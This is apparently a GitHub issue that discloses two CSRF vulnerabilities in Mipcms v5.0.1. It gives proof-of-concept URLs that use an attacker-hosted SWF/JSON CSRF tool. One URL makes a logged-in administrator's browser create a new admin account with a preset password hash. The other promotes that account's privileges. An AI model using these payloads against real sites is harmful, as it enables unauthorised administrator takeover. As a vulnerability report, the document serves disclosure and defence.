mipjz icon indicating copy to clipboard operation
mipjz copied to clipboard

Mipcms v5.0.1 has two CSRF vulnerability that can add the admin user

Open 5huai opened this issue 5 years ago • 0 comments

After the administrator logs in, accessing the following two links can add an administrator user

Poc address:https://github.com/sp1d3r/swf_json_csrf 1、Add a user: http://[Attack domain]/read.html?jsonData={%22groupId%22:1,%22username%22:%22admin123%22,%22password%22:%220192023a7bbd73250516f069df18b500%22,%22rpassword%22:%220192023a7bbd73250516f069df18b500%22}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemAdd 2、Promote user privileges to administrator privileges Log in with admin123, admin123, and get user UID image image Promote user privileges http://[Attack domain]/read.html?jsonData={"uid":"[The UID]","groupId":1,"username":"admin123","password":"3f7caa3d471688b704b73e9a77b1107f","rpassword":"3f7caa3d471688b704b73e9a77b1107f"}&php_url=http://[Attack domain]/test.php&endpoint=http://[Target domain]/index.php?s=/user/ApiAdminUser/itemEdit image

5huai avatar May 12 '19 08:05 5huai